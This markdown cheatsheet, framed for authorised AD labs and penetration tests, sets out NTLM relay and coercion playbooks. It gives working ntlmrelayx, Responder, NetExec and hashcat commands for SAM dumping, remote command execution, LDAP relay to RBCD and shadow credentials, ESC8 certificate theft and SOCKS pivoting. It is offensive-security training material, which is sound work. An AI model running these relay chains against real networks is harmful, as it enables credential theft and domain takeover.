ntlm-kerberos-relay.md (7532B)
1 --- 2 title: "NTLM & Kerberos Relay" 3 description: "Coercion and relay attacks: ntlmrelayx/Responder targets, ADCS/LDAP relay and Kerberos relaying." 4 category: tools 5 tags: [relay, ntlm, kerberos, coercion] 6 tools: [ntlmrelayx, Responder, Coercer] 7 difficulty: advanced 8 updated: "2026-08-09" 9 source: "vault:Tools/NTLM-Kerberos-Relay-Cheatsheet.md" 10 --- 11 12 # NTLM & Kerberos Relay 13 14 > **Context —** HTB / CPTS / authorised AD labs. Tool: Impacket `ntlmrelayx` plus coercion helpers. Flags verified against `ntlmrelayx.py -h` (Impacket v0.13.x). Always re-check on your build. 15 16 Relay playbook for authorised assessments: capture or coerce NTLM authentications, relay to signing-disabled / relay-capable endpoints, optionally escalate via LDAP/AD CS/SOCKS. 17 18 Related notes: Impacket, Certipy, NetExec, BloodHound, Hashcat, Rubeus. 19 20 --- 21 22 ## Summary 23 24 NTLM relay forwards a victim's authentication bytes to a service that accepts them. Classic lab chain: poison or coerce → `ntlmrelayx` listener → dump SAM / LDAP ACL abuse / AD CS enrollment / SOCKS pivot. SMB signing, EPA/channel binding, and Kerberos-only auth are the usual blockers. Use NetExec (`smb --gen-relay-list`) to build target lists. 25 26 > **Danger — authorised-use framing** 27 > 1. Poisoning and coercion are disruptive — stay inside ROE and lab scope. 28 > 2. Do not run Responder + `ntlmrelayx` SMB servers on the same port without coordination (`--no-smb-server` patterns). 29 > 3. Document every coerced host and relay target for the report. 30 31 --- 32 33 ## When Relay Works 34 35 | Condition | Why it matters | 36 |---|---| 37 | SMB signing **not required** on target | Unsigned SMB accepts relayed NTLM | 38 | LDAP/LDAPS signing / channel binding gaps | Enables LDAP relay → ACL / Shadow / DCSync prep | 39 | HTTP service without proper EPA/CBT | AD CS web enrollment (ESC8), other HTTP NTLM apps | 40 | Victim authenticates with **NTLM** (not pure Kerberos) | Relay needs NTLM tokens | 41 | You control listener + have coercion/poison path | No auth → nothing to relay | 42 43 ```bash 44 # Build relayable SMB targets (NetExec) 45 nxc smb 10.10.10.0/24 --gen-relay-list relay.txt 46 ``` 47 48 --- 49 50 ## ntlmrelayx Quick Flags 51 52 | Flag | Purpose | 53 |---|---| 54 | `-t` / `--target` | Relay destination (host or URL) | 55 | `-tf` | Targets file | 56 | `-smb2support` | SMB2 support (almost always needed) | 57 | `-socks` | Open SOCKS proxy on successful relays | 58 | `-c COMMAND` | Execute command on successful SMB relay | 59 | `-e FILE` | Execute binary/export on success | 60 | `-l LOOTDIR` | Loot directory | 61 | `-of OUTPUT_FILE` | Hash / output file prefix | 62 | `--no-smb-server` | Disable incoming SMB server (use with Responder) | 63 | `--adcs` | AD CS enrollment attack mode | 64 | `--template` | Certificate template for AD CS relay | 65 | `--shadow-credentials` | Shadow creds via LDAP relay | 66 | `--delegate-access` | Resource-based constrained delegation setup | 67 | `--remove-mic` | MIC removal tricks (CVE-era / legacy targets) | 68 | `-i` | Interactive shell on success (SMB) | 69 | `-ip` | Interface IP for servers | 70 71 --- 72 73 ## Core Relay Patterns 74 75 ```bash 76 # SMB dump against signing-disabled targets 77 sudo ntlmrelayx.py -tf relay.txt -smb2support 78 79 # Single target + interactive 80 sudo ntlmrelayx.py -t smb://10.10.10.50 -smb2support -i 81 82 # Run a command on success 83 sudo ntlmrelayx.py -t 10.10.10.50 -smb2support -c 'whoami' 84 85 # LDAP relay (ACL / escalation options) 86 sudo ntlmrelayx.py -t ldap://dc.domain.local -smb2support --delegate-access 87 ``` 88 89 > **Command breakdown** 90 > 1. **-tf relay.txt**: only hosts that failed signing checks. 91 > 2. **-smb2support**: required for modern Windows. 92 > 3. **-t ldap://…**: protocol URL selects the relay client module. 93 > 4. Run coercion or Responder in a second terminal after the listener is up. 94 95 --- 96 97 ## AD CS / Shadow / SOCKS 98 99 ```bash 100 # ESC8 via ntlmrelayx HTTP → cert enrollment 101 sudo ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp \ 102 -smb2support --adcs --template DomainController 103 104 # Or use Certipy's dedicated relay (see Certipy sheet) 105 # certipy relay -target http://ca.domain.local/certsrv/certfnsh.asp 106 107 # Shadow credentials via LDAP relay 108 sudo ntlmrelayx.py -t ldap://dc.domain.local -smb2support --shadow-credentials \ 109 --shadow-target 'targetcomputer$' 110 111 # SOCKS pivot after successful relays 112 sudo ntlmrelayx.py -tf relay.txt -smb2support -socks 113 # then: proxychains nxc smb ... / Impacket with proxy 114 ``` 115 116 --- 117 118 ## Coercion Pointers 119 120 > **Tip — common coercion families (authorised labs)** 121 > 1. **MS-RPRN / PrinterBug**, **PetitPotam** (MS-EFSRPC), **DFSCoerce**, **ShadowCoerce** — force a host to authenticate to you. 122 > 2. Point the coerce **listener** at your `ntlmrelayx` / Certipy relay IP. 123 > 3. Prefer targeting machines whose auth lands on a useful relay sink (DC LDAP, CA HTTP, admin workstation SMB). 124 > 4. Exact public PoC flags change — verify the tool `-h` in your kit; do not mix untested coerce + relay ports. 125 126 ```text 127 # Conceptual pattern (tool-specific flags omitted on purpose) 128 # 1) start relay listener 129 # 2) coerce VICTIM → http://YOUR_IP/ or smb://YOUR_IP/ 130 # 3) collect loot / SOCKS / PFX 131 ``` 132 133 --- 134 135 ## Kerberos Notes (vs NTLM) 136 137 > **Why "Kerberos relay" is a different problem** 138 > 1. Classic `ntlmrelayx` chains abuse **NTLM**. Kerberos tickets are service-bound (SPN) and do not relay the same way. 139 > 2. Some modern techniques abuse Kerberos *delegation* / unconstrained / RBCD / s4u — that is ticket abuse (see Rubeus), not NTLM relay. 140 > 3. If the environment forces Kerberos and disables NTLM, pivot to RBCD, AD CS, or credential theft instead of Responder. 141 > 4. LLMNR/NBT-NS poisoning often still yields NetNTLMv2 for Hashcat even when SMB relay is blocked by signing. 142 143 ```bash 144 # Offline crack path when relay is blocked but capture succeeded 145 # Responder → Hashcat mode 5600 (NetNTLMv2) 146 hashcat -m 5600 capture.txt wordlist -r rules/best64.rule 147 ``` 148 149 --- 150 151 ## Practical Recipes 152 153 ```bash 154 # A) Enumerate → relay SMB → SAM 155 nxc smb 10.10.10.0/24 --gen-relay-list relay.txt 156 sudo ntlmrelayx.py -tf relay.txt -smb2support -l loot 157 158 # B) Coerce DC → AD CS HTTP → DC cert → auth 159 sudo ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController 160 # coerce dc$ → attacker 161 # certipy auth -pfx dc.pfx ... 162 163 # C) Responder + relay without SMB port clash 164 sudo responder -I tun0 -dwv # or disable SMB/HTTP in Responder.conf 165 sudo ntlmrelayx.py -tf relay.txt -smb2support --no-smb-server 166 ``` 167 168 --- 169 170 ## Troubleshooting & Gotchas 171 172 > **Common failures** 173 > 1. **Port already in use**: Responder and ntlmrelayx both want 445/80 — use `--no-smb-server` / edit Responder.conf. 174 > 2. **Signing required**: remove target from `relay.txt`; fall back to hash cracking. 175 > 3. **Multi-relay exhausted**: try `--keep-relaying` / fresh coerce; some modes one-shot a session. 176 > 4. **LDAP channel binding**: LDAPS relay options may fail on hardened DCs — check error text. 177 178 --- 179 180 ## Lessons Learned 181 182 1. Generate relay lists first; blind `-t` against signed SMB wastes coerces. 183 2. Separate poison, coerce, and relay into clear terminal roles. 184 3. AD CS relay often beats SMB dumps for domain-class access. 185 4. SOCKS turns one successful session into a reusable pivot — protect that port. 186 5. If NTLM is dead, stop forcing relay — switch to Kerberos/AD CS/RBCD tradecraft. 187 188 --- 189 190 ## References 191 192 1. Impacket ntlmrelayx — https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py 193 2. NetExec wiki — https://www.netexec.wiki/ 194 3. HackTricks — NTLM relay 195 4. Microsoft — NTLM overview 196 5. MITRE ATT&CK — Man-in-the-Middle (T1557)